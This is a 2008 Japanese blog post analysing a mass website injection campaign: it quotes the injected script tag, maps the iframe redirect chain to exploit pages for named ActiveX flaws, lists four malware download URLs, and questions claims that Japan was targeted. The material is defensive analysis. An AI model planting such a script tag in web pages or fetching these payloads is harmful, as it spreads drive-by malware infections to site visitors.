FC2ブログとはあまり関係ありませんが、とりあえず。
JPCERT/CC2008年3月14日
注意喚起。
世界中のサイトで大規模に以下のscriptが仕込まれています
("2117966.net"で検索してみましょう)。
<script src="http://www.2117966.net/fuckjp.js"></script> |
トレンドマイクロに仕掛けられていたのもこれです。
このスクリプトはいくつかのiframeが入れ替わります
(自動で、あるいは犯人の気まぐれで)。
iframeその1
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/q.htm
iframeその2
http://www.2117966.net/fuckjp.js
→http://www.2117966.net/cuteqq.htm
iframeその3
http://www.2117966.net/fuckjp.js
→http://count.lljy.org/b/
また、iframeその3にはさらにiframeがあります。
iframeその4
http://count.lljy.org/b/
→http://biej8fanwo.a141.71one.com/wow/guowai.htm
iframeその1
http://www.2117966.net/q.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/Ms06067.gif
→http://www.2117966.net/Ms07004.htm
→http://www.2117966.net/Pps.gif
→http://www.2117966.net/Real.gif
iframeその2
http://www.2117966.net/cuteqq.htm
→http://www.2117966.net/Ajax.gif
→http://www.2117966.net/Bfyy.gif
→http://www.2117966.net/Lz.gif
→http://www.2117966.net/Ms06014.htm
→http://www.2117966.net/QVod.htm
→http://www.2117966.net/Real.gif
→http://www.2117966.net/XunLei.gif
iframeその3
http://count.lljy.org/b/
→http://count.lljy.org/b/Ajax.gif
→http://count.lljy.org/b/Ms06014.htm
→http://count.lljy.org/b/Ms06067.js
→http://count.lljy.org/b/Ms07004.html
→http://count.lljy.org/b/Real.js
→http://count.lljy.org/b/Yahoo.Php
iframeその4
http://biej8fanwo.a141.71one.com/wow/guowai.htm
→http://biej8fanwo.a141.71one.com/wow/Ajax.gif
→http://biej8fanwo.a141.71one.com/wow/Ms06014.htm
→http://biej8fanwo.a141.71one.com/wow/Ms06067.gif
→http://biej8fanwo.a141.71one.com/wow/Ms07004.htm
→http://biej8fanwo.a141.71one.com/wow/Real.gif
→http://biej8fanwo.a141.71one.com/wow/Yahoo.php
最終的にアンチウイルスが検出・駆除すべきウイルスは以下の4匹です。
http://www.2117966.net/1.exe
http://www.2117966.net/xp.exe
http://count.lljy.org/b/a.exe
http://biej8fanwo.a141.71one.com/wow/wow.exe
わかりやすいファイル名になっていますが、念のためそれぞれを見てみましょう。
ms06014 MS06-014、MDACです。
ms06067 MS06-057の間違いです。MS06-057、WebViewFolderIcon(WEBVW.DLL)です。
ms07004 MS07-004、VML(VGX.DLL)です。
ajax MS06-014、MDACです。
bfyy 暴風(BaoFeng)です(中国)。
lz HanGameCn(韓国ハンゲームの中国向けコントロール)です(中国)。
pps PPStreamです(中国)。
qvod QvodPlayerです(中国)。
real RealPlayerです。
xunlei 迅雷(Xunlei)です(中国)。
yahoo Yahoo!MessengerというかYahoo!MusicJukeboxです。
以上10個の脆弱性は全てActiveXコントロールを使うためIEでしか動作しません。
10個のActiveXコントロールのうちMicrosoft製は3個です(これらの脆弱性は全てWindowsUpdateで阻止できます)。
残り7個のサードパーティ製のうち世界で通用するのはわずかに2個(RealとYahoo!)で、
残り5個は中国内でしか使われていません(これらの脆弱性の阻止については各アプリケーションの製造元に(略))。
ターゲットは中国内外を問わず無差別であることがわかります。
冒頭で書いたとおり世界中のサイトで大規模に仕込まれています。
日本をターゲットとするのならジャストシステムなどのアプリケーションを狙うでしょうし、
海外のいかなる記事も特に日本をターゲットとするような記述はありません。
何が言いたいのかというとですね。
「fuckjp」というファイル名を根拠に「日本をターゲット」と書いたんですか?
LAC2008年3月12日
注意喚起。